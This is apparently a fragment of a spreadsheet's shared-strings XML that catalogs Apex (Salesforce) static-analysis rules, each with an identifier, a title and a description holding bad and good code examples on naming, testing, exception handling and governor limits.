  <si>
    <t>Use the @IsTest annotation</t>
  </si>
  <si>
    <t>Classes containing only test methods should be annotated with @isTest
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class CarTest {						//Bad: needs to be annotated with @isTest
	public static testmethod void testX(){}
	public static testmethod void testY(){}
   // code
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidThrowingNewInstanceOfSameException</t>
  </si>
  <si>
    <t>Avoid Throwing New Instance of Same Exception</t>
  </si>
  <si>
    <t>Catch blocks that merely rethrow a caught exception wrapped inside a new instance of the same type only add to
code size and runtime complexity.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;  
public void bar() {
      try {
       // do something
      }  catch (SomeException se) {
         // harmless comment      
           throw new SomeException(se);  //Bad: this is not recommended.
      }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ReturnEmptyArrayRatherThanNull</t>
  </si>
  <si>
    <t>Return Empty Array, Not Null</t>
  </si>
  <si>
    <t>For any method that returns an array, it is a better to return an empty array rather than a 
null reference. This removes the need for null checking all results and avoids inadvertent
NullPointerExceptions.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Example {
    public Integer[] badBehavior() {		//Bad: Not recommended.
                   // ...
        return null;
    }
    public String[] bonnePratique() {		//Good: Preferred.
      //...
     return new String[0];
    }
}
            &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ExcessiveMethodLength</t>
  </si>
  <si>
    <t>Excessive Method Length</t>
  </si>
  <si>
    <t>When methods are excessively long this usually indicates that the method is doing more than its
name/signature might suggest. They also become challenging for others to digest since excessive 
scrolling causes readers to lose focus.
Try to reduce the method length by creating helper methods and removing any copy/pasted code.
   &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void doSomething() {
	system.debug('Hello world!');
	system.debug('Hello world!');
		// 98 copies omitted for brevity.
}
   &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnitTestsShouldIncludeAssert</t>
  </si>
  <si>
    <t>Unit Test Method should include an assertion</t>
  </si>
  <si>
    <t>Unit tests should include at least one assertion.  This makes the tests more robust, and using assert 
with messages provide the developer a clearer idea of what the test does.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
@IsTest
public class Foo  {
    public static testmethod void testSomething() {
        Integer result = 1 + 2;
        Assert.areEqual(3, result);    //Good: result is checked with an assertion.
   }
}
@IsTest
public class Foo  {
   public static testmethod void testSomething() {
   	  Integer result = 3 + 4;						//Bad: result is not checked.
   }
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:IdempotentOperations</t>
  </si>
  <si>
    <t>Assignment Has No Effect</t>
  </si>
  <si>
    <t>Avoid idempotent operations. There is no affect when assigning a variable to itself, this may indicate a bug.&lt;br/&gt;&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.securecoding.cert.org/confluence/x/NYA5"&gt;CERT, MSC12-C.&lt;/a&gt; - Detect and remove code that has no effect or is never executed.&lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public void bar() {
    Integer x = 2;
    x = x;			//Bad: Avoid this.
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:MethodWithSameNameAsEnclosingClass</t>
  </si>
  <si>
    <t>Method with Same Name as Enclosing Class</t>
  </si>
  <si>
    <t>Non-constructor methods should not have the same name as the enclosing class.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyClass {
	public MyClass() {}			//Good: this is OK because it is a constructor.
	public void MyClass() {}	//Bad: this is a method.
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:VariableCouldBeTransient</t>
  </si>
  <si>
    <t>Controller Variable Could Be Declared Transient</t>
  </si>
  <si>
    <t>Consider marking this variable as transient as transient variables are not stored in a page's view-state. 
Most non-transient data members of a controller which has an apex:form is stored in a page's view-state. 
Salesforce pages have a limit on view-state size.
This rule checks controllers classes whose pages have an apex:forms (therefore view-state can exist). 
This rule flags non-transient array and object fields, which are more likely to large amounts of view-state.
Care must be taken when marking a field as transient as this field will need to be recreated on every request.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class BarController {
	List&lt;Account&gt; accounts; 		//Bad: the amount of data may exceed the view-state limit.
	transient List&lt;Account&gt; accounts; //Good: accounts are not stored in view-state.
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmptyStatementNotInLoop</t>
  </si>
  <si>
    <t>Empty Statement Not in Loop</t>
  </si>
  <si>
    <t>An empty statement (or a semicolon by itself) that is not used as the sole body of a 'for' 
or 'while' loop is probably a bug.  It could also be a double semicolon, which has no purpose
and should be removed.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void doit() {
      system.debug('look at the extra semicolon');; //Bad: This semicolon has no purpose.
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UncommentedEmptyMethod</t>
  </si>
  <si>
    <t>Uncommented Empty Method</t>
  </si>
  <si>
    <t>Uncommented Empty Method finds instances where a method does not contain
statements, but there is no comment. By explicitly commenting empty methods
it is easier to distinguish between intentional (commented) and unintentional
empty methods.
Comments can be added inside the method or a formal comment (/** comment */) above the method is also valid
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void doSomething() {		//Bad: Consider commenting this method.
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:LogicInversion</t>
  </si>
  <si>
    <t>Logic Inversion</t>
  </si>
  <si>
    <t>Use opposite operator instead of negating the whole expression with a logic complement operator.
	&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public boolean bar(Integer a, Integer b) {
	if (!(a == b)){ 		//Bad: Use '!=' instead.
         return false;
    }
	if (!(a &lt; b)){		//Bad: Use '&gt;=' instead.
         return false;
    }
	return true;
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ArrayIsStoredDirectly</t>
  </si>
  <si>
    <t>Array is Stored Directly</t>
  </si>
  <si>
    <t>Constructors and methods receiving arrays should clone objects and store the copy.&lt;br/&gt;
This prevents future changes from the user affecting the internal functionality.&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/374"&gt;MITRE, CWE-374&lt;/a&gt; - Passing Mutable Objects to an Untrusted Method&lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/QIEVAQ"&gt;CERT, OBJ06-J.&lt;/a&gt; - Defensively copy mutable inputs and mutable internal
  components &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/JQLEAw"&gt;CERT, OBJ13-J.&lt;/a&gt; - Ensure that references to mutable objects are not exposed
  &lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  private String [] x;
    public void foo (String [] param) {
      this.x=param;		//Bad: don't do this, make a copy of the array at least.
    }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AbstractNaming</t>
  </si>
  <si>
    <t>Abstract Naming Conventions</t>
  </si>
  <si>
    <t>Abstract classes should be named 'AbstractXXX'.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public abstract class Foo {  //Bad: this should be 'AbstractFoo'.
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UselessStringValueOf</t>
  </si>
  <si>
    <t>Useless String Value Of</t>
  </si>
  <si>
    <t>No need to call String.valueOf to append to a string; just use the valueOf() argument directly.&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
Note: Currently, there is no Date.format(string) function. The preferred method for formatting a date instead of String.valueOf(dateNow) to avoid Timezone problems is:&lt;br/&gt;
	&lt;pre&gt;DateTime.newInstance(dateNow, Time.newInstance(0,0,0,0)).format('YYYY-MM-DD');&lt;/pre&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public String convert(Integer i) {
	String s;
	s = 'a' + String.valueOf(i);	//Bad: String.valueOf() is not required.
	s = 'a' + i; 					//Good: This approach is preferred.
	return s;
}
          &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:CommentContent</t>
  </si>
  <si>
    <t>Invalid Comment Words or Phrases Found</t>
  </si>
  <si>
    <t>A rule for the politically correct... we don't want to offend anyone.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
/*      
*OMG, this is horrible, Bob is an idiot !!!   		//Bad: That's not very nice!
*/     
/*      
*This could be better. Bob, take note.   			//Good: Preferred.
*/     
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ShortClassName</t>
  </si>
  <si>
    <t>Short Class Name</t>
  </si>
  <si>
    <t>Classes with short names are not recommended.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {  //Bad: this is not recommended.
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AtLeastOneConstructor</t>
  </si>
  <si>
    <t>At Least One Constructor</t>
  </si>
  <si>
    <t>Each class should declare at least one constructor.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {	
 public void doSomething() { ... }		//Bad: Class is missing a Constructor.
 public void doOtherThing { ... }
}
public class Bar {	
 public void Bar(){ ... }			//Good: Class has a Constructor.
 public void doSomething() { ... }		
 public void doOtherThing { ... }
}
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnitAssertionsShouldIncludeMessage</t>
  </si>
  <si>
    <t>Unit Assertions should include a Message</t>
  </si>
  <si>
    <t>Unit assertions should include a message - i.e., use the three argument version of
assertEquals(), not the two argument version.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo extends TestCase {
 public void testSomething() {
  System.assertEquals('foo', 'bar');  	//Bad: assertEquals() does not contain a message.
  System.assertEquals('foo', 'bar', 'Foo does not equal bar');  //Good: use this method instead.
 }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidCatchingThrowable</t>
  </si>
  <si>
    <t>Avoid Catching Throwable</t>
  </si>
  <si>
    <t>Catching Throwable errors is not recommended since its scope is very broad. It includes runtime issues such as OutOfMemoryError that should be exposed and managed separately.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/396.html"&gt;MITRE, CWE-396&lt;/a&gt; - Declaration of Catch for Generic Exception &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/BIB3AQ"&gt;CERT, ERR08-J.&lt;/a&gt; - Do not catch NullPointerException or any of its ancestors
  &lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void bar() {
	try {
     // do something
    } catch (Throwable th) {  //Bad: should not catch 'Throwable'.
		th.printStackTrace();
    }
  }
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ShortMethodName</t>
  </si>
  <si>
    <t>Short Method Name</t>
  </si>
  <si>
    <t>Method names that are very short are not helpful to the reader.
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class ShortMethod {
	public void a( Integer i ) { //Bad: The method name should be more descriptive.
	}
}
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:NullAssignment</t>
  </si>
  <si>
    <t>Null Assignment</t>
  </si>
  <si>
    <t>Assigning a "null" to a variable (outside of its declaration) is usually bad form.  Sometimes, this type
of assignment is an indication that the programmer doesn't completely understand what is going on in the code.  
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void bar() {
	Object x = null; 				//Good: This is OK.
	x = new Object();
     // big, complex piece of code here
	x = null; 						//Bad: This is not required.
     // big, complex piece of code here
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidUsingTestIsRunningTest</t>
  </si>
  <si>
    <t>Avoid Using Test.isRunningTest()</t>
  </si>
  <si>
    <t>Avoid using Test.isRunningTest(), using this can hide problems that occur during testing.
		&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyClass  {
  public static void myFunction() {
    if ( !Test.isRunningTest ){      //Bad: This is not recommended.
	  //don't run during tests.
	}
  }
}
		&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:MisplacedNullCheck</t>
  </si>
  <si>
    <t>Misplaced Null Check</t>
  </si>
  <si>
    <t>The null check here is misplaced. If the variable is null a NullPointerException will be thrown.
Either the check is useless (the variable will never be null) or it is incorrect.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	void bar() {
		if (a.equals(baz) &amp;&amp; a != null) {  //Bad: If a is null, an exception will be thrown before the 'if' statement checks that a is not null.
			//...
		}
		if (a != null &amp;&amp; a.equals(baz)) {  //Good: The 'if' statement checks if a is null before using a.
			//...
		}
	}
}
public class Foo {
	void bar() {
		if (a.equals(baz) || a == null) {	//Bad: If a is null, an exception will be thrown before the 'if' statement checks if a is null.
			//..
		}
		if (a == null || a.equals(baz)) {	//Good: The 'if' statement will run if a is null or a.equals(baz) is true.
			//..
		}
	}
}
   &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:HotspotEncrypt</t>
  </si>
  <si>
    <t>Encrypting Data Is Security-Sensitive</t>
  </si>
  <si>
    <t>Encrypting data is security-sensitive. Although most encryption problems are solved or managed by Salesforce, care must be taken when relying on encryption.&lt;br/&gt;
&lt;br/&gt;
See &lt;a href="https://developer.salesforce.com/page/Secure_Coding_Storing_Secrets"&gt;Storing Sensitive Data&lt;/a&gt; for more information.&lt;br/&gt;
&lt;br/&gt;
For example:&lt;br/&gt;
&lt;ul&gt;
	&lt;li&gt;Ensure that keys are generated randomly&lt;/li&gt;
	&lt;li&gt;That keys are stored securely in a Protected Custom Setting or Protected Custom Metadata type&lt;/li&gt;
	&lt;li&gt;Never store keys in Apex classes&lt;/li&gt;
	&lt;li&gt;You may want to consider a key-rotation scheme&lt;/li&gt;
	&lt;li&gt;Consider whether the keys can be leaked: have the keys been downloaded to an unsecure site, for example&lt;/li&gt;
&lt;/ul&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/522.html"&gt;MITRE, CWE-522&lt;/a&gt; - Insufficiently Protected Credentials &lt;/li&gt;
  &lt;li&gt; [OWASP Top 10 2021 Category A2 - Identification and Authentication Failures &lt;/li&gt;
  &lt;li&gt; [OWASP Top 10 2021 Category A5 - Security Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>sf:UnnecessaryConstructor</t>
  </si>
  <si>
    <t>Unnecessary Constructor</t>
  </si>
  <si>
    <t>This rule detects when a constructor is not necessary; i.e., when there is only one constructor,
it's public, has an empty body, and takes no arguments.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo { 
  public Foo() {}		//Bad: This constructor is unnecessary.
  public Foo(List bar) {  //Good: This constructor serves a purpose.
  	//do work....
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ClassNamingConventions</t>
  </si>
  <si>
    <t>Class Naming Conventions</t>
  </si>
  <si>
    <t>Class names should always begin with an upper case character.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {}		//Good: this is preferred.
public class foo {}		//Bad: not recommended.
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:SimpleRedirectAction</t>
  </si>
  <si>
    <t>Page Action with a simple redirection</t>
  </si>
  <si>
    <t>Avoid creating page action which makes a simple client side redirect.
&lt;br/&gt;
Consider using an apex:outputLink in your apex:form or other non action method instead and implement the action through an apex:page action attribute - where it makes sense.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class EditController {
  public PageReference Close()
  {
    PageReference pr = new PageReference('/home/home.jsp');
    pr.setRedirect(true); //Bad: The action method contains only client-side GET redirect.
    return pr;
  }
}
&amp;lt;apex:outputLink value=&amp;quot;{!$Page.homePage}&amp;quot;&gt; //Good: Client-side redirect can be implemented with an apex:outputLink component.
  Home Page
&amp;lt;/apex:outputLink&gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnnecessaryConversionTemporary</t>
  </si>
  <si>
    <t>Unnecessary Temporary Variable for String Conversion</t>
  </si>
  <si>
    <t>Avoid the use temporary objects when converting primitives to Strings. Use the static conversion methods
on the wrapper classes instead.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public String convert(Integer x) {
	String foo = new Integer(x).toString();	//Bad: this wastes an object.
	return Integer.toString(x);				//Good: preferred approach.
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:PositionLiteralsFirstInComparisons</t>
  </si>
  <si>
    <t>Position Literals First in Comparisons</t>
  </si>
  <si>
    <t>Position literals first in comparisons, if the second argument is null then NullPointerExceptions 
can be avoided, they will just return false.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
class Foo {
  boolean bar(String x) {
    return x.equals('2'); 	//Bad: this can result in a null pointer
  }
  boolean foo(String x) {
    return '2'.equals(x); 	//Good: this is preferred
  }
}
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ReturnFromFinallyBlock</t>
  </si>
  <si>
    <t>Return from Finally Block</t>
  </si>
  <si>
    <t>Avoid returning from a finally block, this can discard exceptions.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/584.html"&gt;MITRE, CWE-584&lt;/a&gt; - Return Inside Finally Block &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/mIEbAQ"&gt;CERT, ERR04-J.&lt;/a&gt; - Do not complete abruptly from a finally block &lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Bar {
	public String foo() {
		try {
			doHeapsOfStuff();
		} catch (Exception e) {
			throw e;
		} finally {
			return 'A. O. K.';  		//Bad: Return is not recommended here.
		}
		return 'A. O. K.'; 				//Good: A return outside the block will not discard exceptions
	}
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:LocalVariableCouldBeFinal</t>
  </si>
  <si>
    <t>Local Variable Could Be Final</t>
  </si>
  <si>
    <t>A local variable assigned only can be declared final once.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Bar {
	public void foo () {
		String a = 'a'; 		//Bad: if a will not be assigned again it is better to make it final.
		final String b = 'b';	//Good: this is preferred.
	}
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidUsingBatchApexInTrigger</t>
  </si>
  <si>
    <t>Using Batch Apex from a trigger is dangerous</t>
  </si>
  <si>
    <t>Using Batch Apex from a trigger is dangerous.
&lt;br/&gt;
You must be able to guarantee that the trigger does not add more batch jobs than the limit. In particular, consider API bulk updates, import wizards, mass record changes through the user interface, and all cases where more than one record can be updated at a time.
&lt;br/&gt;
Read more here: &lt;a href ="https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/apex_batch_interface.htm"&gt;Salesforce Developers - Using Batch Apex&lt;/a&gt;
&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
trigger OpportunityTrigger on Opportunity (after insert, after update) {
  ID batchprocessid = Database.executeBatch(worker); //Bad: Executing Apex Batch from Trigger.
}
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidSoqlAggregate</t>
  </si>
  <si>
    <t>Avoid Calling Aggregate Functions on Non-Grouped Query</t>
  </si>
  <si>
    <t>Calling aggregate functions can easily overrun governor limits that limit the total number of rows accessed.
Instead of using Min/Max of a column, it's better to sort the query and return a limit of 1 to get the top/bottom item
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
[ Select Max(LastModifiedDate) From Account ] // Bad: This query can cause a governor limit error if there are too many Accounts.
[ Select LastModifiedDate From Account Order By LastModifiedDate Desc Limit 1 ] //Good: This query will not cause a governor limit error.
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ClassWithoutTestCases</t>
  </si>
  <si>
    <t>Test Methods in Non-Test Class</t>
  </si>
  <si>
    <t>Having test methods in non-test classes is not a good practice. Move the test methods into a separate test class.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
//Consider moving test methods to a separate test class
public class Car {
   public static testmethod () {		//Bad: consider moving to a separate test class.
    // do something
   }
   // code
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidDMLInUnitTests</t>
  </si>
  <si>
    <t>Avoid DML in Tests</t>
  </si>
  <si>
    <t>Avoid DML which creates data in unit test functions. These functions should be moved into helper functions and re-used.
This rule specifically looks for 'insert' DML in test methods.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class SimpleTest {
	public static testmethod void testX() {
		Account a = new Account();
		a.name = 'Test';
		insert a;     //Bad: the account should be created in a helper function
	}
}
          &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:TooManyMethods</t>
  </si>
  <si>
    <t>Too Many Methods</t>
  </si>
  <si>
    <t>A class with too many methods is probably a good suspect for refactoring, in order to reduce its complexity and find a way to
have more fine grained objects.  Get and set methods for class variables should be replaced where possible with an accessor. 
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;
Account myAccount { 
  get{ return [ select id ... ]; }
}
&lt;/pre&gt;            
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo { 
	private void doWork() {}
	public void doPublicWork() {}
	public void doWorkAgain() {}
	private void soMuchWork(){}
 // [... more and more methods ...]		//Bad: Too many methods, consider refactoring. 
}
   &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:FutureMethodInLoop</t>
  </si>
  <si>
    <t>Avoid Calling @Future Methods Inside Loops</t>
  </si>
  <si>
    <t>Avoid calling @Future Methods Inside Loops. Soql and DML calls within loops can cause governor limit exceptions.
 	  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Something {
   @future public void futureMethod(){  
   }
	public void badAction() {  
		for (Integer i = 0; i &lt; 10; i++) {
		  futureMethod();			//Bad: this is not recommended.
		}
	} 
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:WhileLoopsMustUseBraces</t>
  </si>
  <si>
    <t>While Loops Must Use Braces</t>
  </si>
  <si>
    <t>Avoid using 'while' statements without using braces to surround the code block. If the code 
formatting or indentation is lost then it becomes difficult to separate the code being
controlled from the rest.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
while (true)	//Bad: Not recommended.
      x++;
while (true) {	//Good: Preferred approach.
      x++;
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidPrefixingMethodParameters</t>
  </si>
  <si>
    <t>Avoid Prefixing Method Parameters</t>
  </si>
  <si>
    <t>Prefixing parameters by 'in' or 'out' pollutes the name of the parameters and reduces code readability. 
To indicate whether or not a parameter will be modified in a method, its better to document method
behavior with comments.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public void bar(
      Integer inLeftOperand,		//Bad: This is unclear and not recommended. 
      Result outRightOperand) {
      outRightOperand.setValue(inLeftOperand * outRightOperand.getValue());
  }
}
public class Foo {
	/**
	 * 
	 * @param leftOperand, (purpose), not modified by method.
	 * @param rightOperand (purpose), will be modified by the method: contains the result.
	 */
	public void bar(				//Good: This is preferred.
	      Integer leftOperand,
	      Result rightOperand) {
	      rightOperand.setValue(leftOperand * rightOperand.getValue());
	}
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:SimplifiedTernary</t>
  </si>
  <si>
    <t>Ternary Operators Can Be Simplified With || or &amp;&amp;</t>
  </si>
  <si>
    <t>Look for ternary operators with the form `condition ? literalBoolean : foo`
or `condition ? foo : literalBoolean`.&lt;br/&gt;
These expressions can be simplified respectively to:&lt;br/&gt;
`condition || foo`  when the literalBoolean is true&lt;br/&gt;
`!condition &amp;&amp; foo` when the literalBoolean is false&lt;br/&gt;&lt;br/&gt;
or&lt;br/&gt;&lt;br/&gt;
`!condition || foo` when the literalBoolean is true&lt;br/&gt;
`condition &amp;&amp; foo`  when the literalBoolean is false&lt;br/&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
    public boolean test() {
        return condition ? true : something(); //Can be as simple as return condition || something();
    }
    public void test2() {
        final boolean value = condition ? false : something(); //Can be as simple as value = !condition &amp;&amp; something();
    }
    public boolean test3() {
        return condition ? something() : true; //Can be as simple as return !condition || something();
    }
    public void test4() {
        final boolean otherValue = condition ? something() : false; //Can be as simple as condition &amp;&amp; something();
    }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AssignmentInOperand</t>
  </si>
  <si>
    <t>Avoid Assignments in Operands</t>
  </si>
  <si>
    <t>Avoid assignments in operands; this can make code more complicated and harder to read.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void babar() {
 System.debug(a = 0);   	//Bad: assignment in a call is not recommended.
}
public void bar() {
    Integer x = 2;
    if ((x = getX()) == 3) {  //Bad: assignment in an if conditional is not recommended.
      system.debug('3!');
    }
}
public void barber() {
  Integer x = 2;
  while ( (x = getX()) != 0 ) {}  //Bad: assignment in a while conditional is not recommended.
 }
public void better() {
    Integer x = 2;
    x = getX();
    if (x == 3) {  			  //Good: the assignment is performed outside the operand.
      system.debug('3!');
    }
}
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:LongVariable</t>
  </si>
  <si>
    <t>Long Variable Name</t>
  </si>
  <si>
    <t>Fields, formal arguments, or local variable names that are too long can make the code difficult to follow.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Something {
	Integer reallyLongIntName = -3;  			//Bad: field name is too long.
	public static void main( String argumentsList[] ) { //Bad: formal arg name is too long.
		Integer otherReallyLongName = -5; 		//Bad: local variable name is too long
		for (Integer interestingIntIndex = 0;	//Bad: 'for' loop index name is too long.
             interestingIntIndex &lt; 10;
             interestingIntIndex ++ ) {
    }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:SuspiciousConstantFieldName</t>
  </si>
  <si>
    <t>Suspicious Constant Field Name</t>
  </si>
  <si>
    <t>Field names using all uppercase characters - which some naming conventions indicate to be constants - should
be declared as final.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  double PI = 3.16;			//Bad: the value of PI can be altered.
  final double PI = 3.16; 	//Good: this is preferred.
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidProtectedFieldInFinalClass</t>
  </si>
  <si>
    <t>Avoid Protected Field in Final Class</t>
  </si>
  <si>
    <t>Do not use protected fields in final classes since they cannot be subclassed.
Clarify your intent by using private or package access modifiers instead.
         &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public final class Bar {
  private Integer x;
  protected Integer y;  //Bad: Bar cannot be subclassed, y should be made either private or package visible.
  Bar() {}
}
         &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:NonStaticInitializer</t>
  </si>
  <si>
    <t>Non Static Initializer</t>
  </si>
  <si>
    <t>A non-static initializer block will be called any time a constructor is invoked (just prior to 
invoking the constructor).  While this is a valid language construct, it is rarely used and is 
confusing.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyClass {
  {
   system.debug('I am about to construct myself'); //Bad: This block gets run before any call to a constructor
  }
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:TooManyFields</t>
  </si>
  <si>
    <t>Too Many Fields</t>
  </si>
  <si>
    <t>Classes that have too many fields can become unwieldy and could be redesigned to have fewer fields,
possibly through grouping related fields in new objects.  For example, a class with individual 
city/state/zip fields could park them within a single Address field.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Person {	//Bad: Too many separate fields.
   Integer birthYear;
   Integer birthMonth;
   Integer birthDate;
   float height;
   float weight;
}
public class Person {	//Good: This is more manageable.
   Date birthDate;
   BodyMeasurements measurements;
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AuraControllerNaming</t>
  </si>
  <si>
    <t>Aura Controller Naming Convention</t>
  </si>
  <si>
